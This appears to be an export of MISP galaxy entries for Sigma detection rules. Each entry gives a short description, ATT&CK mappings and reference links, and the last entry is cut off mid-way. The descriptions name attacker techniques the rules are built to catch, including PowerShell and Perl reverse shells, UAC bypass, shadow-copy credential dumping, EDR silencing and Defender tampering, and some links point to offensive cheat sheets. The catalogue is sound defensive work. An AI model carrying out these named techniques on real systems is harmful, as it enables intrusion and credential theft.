Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.

The tag is: misp-galaxy:sigma-rules="Suspicious FromBase64String Usage On Gzip Archive - Process Creation"

Suspicious FromBase64String Usage On Gzip Archive - Process Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 10160. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string_archive.yml

UAC Bypass Tools Using ComputerDefaults

Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Tools Using ComputerDefaults"

UAC Bypass Tools Using ComputerDefaults has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10161. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml

Password Protected Compressed File Extraction Via 7Zip

Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.

The tag is: misp-galaxy:sigma-rules="Password Protected Compressed File Extraction Via 7Zip"

Password Protected Compressed File Extraction Via 7Zip has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10162. Table References

Links

https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_password_extraction.yml

HackTool - Koadic Execution

Detects command line parameters used by the Koadic hack tool

The tag is: misp-galaxy:sigma-rules="HackTool - Koadic Execution"

HackTool - Koadic Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 10163. Table References

Links

https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js

https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/

https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_koadic.yml

Always Install Elevated MSI Spawned Cmd And Powershell

Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"

The tag is: misp-galaxy:sigma-rules="Always Install Elevated MSI Spawned Cmd And Powershell"

Always Install Elevated MSI Spawned Cmd And Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10164. Table References

Links

https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml

Potentially Over Permissive Permissions Granted Using Dsacls.EXE

Detects usage of Dsacls to grant overly permissive permissions

The tag is: misp-galaxy:sigma-rules="Potentially Over Permissive Permissions Granted Using Dsacls.EXE"

Potentially Over Permissive Permissions Granted Using Dsacls.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10165. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)

https://ss64.com/nt/dsacls.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml

Shadow Copies Creation Using Operating Systems Utilities

Detects shadow copy creation using operating system utilities, a possible sign of credential access

The tag is: misp-galaxy:sigma-rules="Shadow Copies Creation Using Operating Systems Utilities"

Shadow Copies Creation Using Operating Systems Utilities has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10166. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_creation.yml

Perl Inline Command Execution

Detects execution of perl using the "-e"/"-E" flags. This could be used as a way to launch a reverse shell or execute inline perl code.

The tag is: misp-galaxy:sigma-rules="Perl Inline Command Execution"

Perl Inline Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10167. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml

Suspicious Obfuscated PowerShell Code

Detects suspicious UTF-16 and base64-encoded, often obfuscated, PowerShell code as commonly seen in command lines

The tag is: misp-galaxy:sigma-rules="Suspicious Obfuscated PowerShell Code"

Table 10168. Table References

Links

https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_obfusc.yml

Remote Access Tool - GoToAssist Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - GoToAssist Execution"

Remote Access Tool - GoToAssist Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10169. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml

Curl Web Request With Potential Custom User-Agent

Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accepts specific "User-Agent" strings

The tag is: misp-galaxy:sigma-rules="Curl Web Request With Potential Custom User-Agent"

Table 10170. Table References

Links

https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml

Suspicious Execution of Shutdown

Detects use of the command line to shut down or reboot Windows

The tag is: misp-galaxy:sigma-rules="Suspicious Execution of Shutdown"

Suspicious Execution of Shutdown has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

Table 10171. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_execution.yml

PUA - System Informer Execution

Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations

The tag is: misp-galaxy:sigma-rules="PUA - System Informer Execution"

PUA - System Informer Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 10172. Table References

Links

https://github.com/winsiderss/systeminformer

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_system_informer.yml

Suspicious RunAs-Like Flag Combination

Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools

The tag is: misp-galaxy:sigma-rules="Suspicious RunAs-Like Flag Combination"

Table 10173. Table References

Links

https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml

HackTool - EDRSilencer Execution

Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.

The tag is: misp-galaxy:sigma-rules="HackTool - EDRSilencer Execution"

HackTool - EDRSilencer Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 10174. Table References

Links

https://github.com/netero1010/EDRSilencer

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_edrsilencer.yml

PowerShell Web Download

Detects suspicious ways to download files or content using PowerShell

The tag is: misp-galaxy:sigma-rules="PowerShell Web Download"

PowerShell Web Download has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10175. Table References

Links

https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_cradles.yml

PUA - AdvancedRun Suspicious Execution

Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts

The tag is: misp-galaxy:sigma-rules="PUA - AdvancedRun Suspicious Execution"

PUA - AdvancedRun Suspicious Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

Table 10176. Table References

Links

https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/

https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/

https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3

https://twitter.com/splinter_code/status/1483815103279603714

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml

HackTool - TruffleSnout Execution

Detects the use of TruffleSnout.exe, an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low-noise enumeration.

The tag is: misp-galaxy:sigma-rules="HackTool - TruffleSnout Execution"

HackTool - TruffleSnout Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

Table 10177. Table References

Links

https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md

https://github.com/dsnezhkov/TruffleSnout

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_trufflesnout.yml

Suspicious Use of PsLogList

Detects usage of the PsLogList utility to dump event logs in order to extract admin accounts and perform account discovery, or to delete event logs

The tag is: misp-galaxy:sigma-rules="Suspicious Use of PsLogList"

Suspicious Use of PsLogList has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

Table 10178. Table References

Links

https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/

https://twitter.com/EricaZelic/status/1614075109827874817

https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos

https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psloglist.yml

Potential Dropper Script Execution Via WScript/CScript

Detects wscript/cscript executions of scripts located in user directories

The tag is: misp-galaxy:sigma-rules="Potential Dropper Script Execution Via WScript/CScript"

Potential Dropper Script Execution Via WScript/CScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 10179. Table References

Links

https://redcanary.com/blog/gootloader/

https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_cscript_dropper.yml

New Service Creation Using Sc.EXE

Detects the creation of a new service using the "sc.exe" utility.

The tag is: misp-galaxy:sigma-rules="New Service Creation Using Sc.EXE"

New Service Creation Using Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10180. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_create_service.yml

Non Interactive PowerShell Process Spawned

Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.

The tag is: misp-galaxy:sigma-rules="Non Interactive PowerShell Process Spawned"

Non Interactive PowerShell Process Spawned has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10181. Table References

Links

https://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_non_interactive_execution.yml

Execute Files with Msdeploy.exe

Detects file execution using the msdeploy.exe lolbin

The tag is: misp-galaxy:sigma-rules="Execute Files with Msdeploy.exe"

Execute Files with Msdeploy.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10182. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/

https://twitter.com/pabraeken/status/995837734379032576

https://twitter.com/pabraeken/status/999090532839313408

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml

UAC Bypass Using PkgMgr and DISM

Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using PkgMgr and DISM"

UAC Bypass Using PkgMgr and DISM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10183. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml

Lolbin Runexehelper Use As Proxy

Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs

The tag is: misp-galaxy:sigma-rules="Lolbin Runexehelper Use As Proxy"

Lolbin Runexehelper Use As Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10184. Table References

Links

https://twitter.com/0gtweet/status/1206692239839289344

https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml

Dism Remove Online Package

Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

The tag is: misp-galaxy:sigma-rules="Dism Remove Online Package"

Dism Remove Online Package has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10185. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism

https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml

Suspicious Response File Execution Via Odbcconf.EXE

Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.

The tag is: misp-galaxy:sigma-rules="Suspicious Response File Execution Via Odbcconf.EXE"

Suspicious Response File Execution Via Odbcconf.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10187. Table References

Links

https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16

https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml

Potential Windows Defender Tampering Via Wmic.EXE

Detects potential tampering with Windows Defender settings, such as adding exclusions, using wmic

The tag is: misp-galaxy:sigma-rules="Potential Windows Defender Tampering Via Wmic.EXE"

Potential Windows Defender Tampering Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

Table 10188. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md

https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/

https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml

Hiding Files with Attrib.exe

Detects usage of attrib.exe to hide files from users.

The tag is: misp-galaxy:sigma-rules="Hiding Files with Attrib.exe"

Hiding Files with Attrib.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 10189. Table References

Links

https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/

https://www.uptycs.com/blog/lolbins-are-no-laughing-matter

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml

Suspicious Reg Add BitLocker

Detects suspicious addition to BitLocker related registry keys via the reg.exe utility

The tag is: misp-galaxy:sigma-rules="Suspicious Reg Add BitLocker"

Suspicious Reg Add BitLocker has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

Table 10190. Table References

Links

https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_bitlocker.yml

Uncommon Child Process Of Appvlp.EXE

Detects uncommon child processes of Appvlp.EXE. Appvlp, or the Application Virtualization Utility, is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file.

The tag is: misp-galaxy:sigma-rules="Uncommon Child Process Of Appvlp.EXE"

Uncommon Child Process Of Appvlp.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10191. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml

Potential Defense Evasion Via Right-to-Left Override

Detects the presence of the "U+202E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading technique.

The tag is: misp-galaxy:sigma-rules="Potential Defense Evasion Via Right-to-Left Override"

Potential Defense Evasion Via Right-to-Left Override has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Right-to-Left Override - T1036.002" with estimative-language:likelihood-probability="almost-certain"

Table 10192. Table References

Links

https://unicode-explorer.com/c/202E

https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method

https://redcanary.com/blog/right-to-left-override/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml

Windows Processes Suspicious Parent Directory

Detect suspicious parent processes of well-known Windows processes

The tag is: misp-galaxy:sigma-rules="Windows Processes Suspicious Parent Directory"

Windows Processes Suspicious Parent Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 10193. Table References

Links

https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/

https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2

https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_proc_wrong_parent.yml

File In Suspicious Location Encoded To Base64 Via Certutil.EXE

Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations

The tag is: misp-galaxy:sigma-rules="File In Suspicious Location Encoded To Base64 Via Certutil.EXE"

File In Suspicious Location Encoded To Base64 Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10194. Table References

Links

https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior

https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior

https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior

https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml

Suspicious Redirection to Local Admin Share

Detects a suspicious output redirection to the local admin share. This technique is often found in malicious scripts or hacktool stagers.

The tag is: misp-galaxy:sigma-rules="Suspicious Redirection to Local Admin Share"

Suspicious Redirection to Local Admin Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 10195. Table References

Links

https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml

Wlrmdr Lolbin Use as Launcher

Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute

The tag is: misp-galaxy:sigma-rules="Wlrmdr Lolbin Use as Launcher"

Wlrmdr Lolbin Use as Launcher has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10196. Table References

Links

https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml

Renamed Mavinject.EXE Execution

Detects the execution of a renamed version of the "Mavinject" process, which can be abused to perform process injection using the "/INJECTRUNNING" flag.

The tag is: misp-galaxy:sigma-rules="Renamed Mavinject.EXE Execution"

Renamed Mavinject.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Mavinject - T1218.013" with estimative-language:likelihood-probability="almost-certain"

Table 10197. Table References

Links

https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection

https://github.com/SigmaHQ/sigma/issues/3742

https://twitter.com/Hexacorn/status/776122138063409152

https://twitter.com/gN3mes1s/status/941315826107510784

https://reaqta.com/2017/12/mavinject-microsoft-injector/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml

Potential Powershell ReverseShell Connection

Detects usage of the "TcpClient" class, which can be abused to establish remote connections and reverse shells, as seen in the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and others.

The tag is: misp-galaxy:sigma-rules="Potential Powershell ReverseShell Connection"

Potential Powershell ReverseShell Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10198. Table References

Links

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml

New Remote Desktop Connection Initiated Via Mstsc.EXE

Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

The tag is: misp-galaxy:sigma-rules="New Remote Desktop Connection Initiated Via Mstsc.EXE"

New Remote Desktop Connection Initiated Via Mstsc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 10199. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_remote_connection.yml

Remote Access Tool - ScreenConnect Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect Execution"

Remote Access Tool - ScreenConnect Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10200. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml

Suspicious Vsls-Agent Command With AgentExtensionPath Load

Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter

The tag is: misp-galaxy:sigma-rules="Suspicious Vsls-Agent Command With AgentExtensionPath Load"

Suspicious Vsls-Agent Command With AgentExtensionPath Load has relationships with:

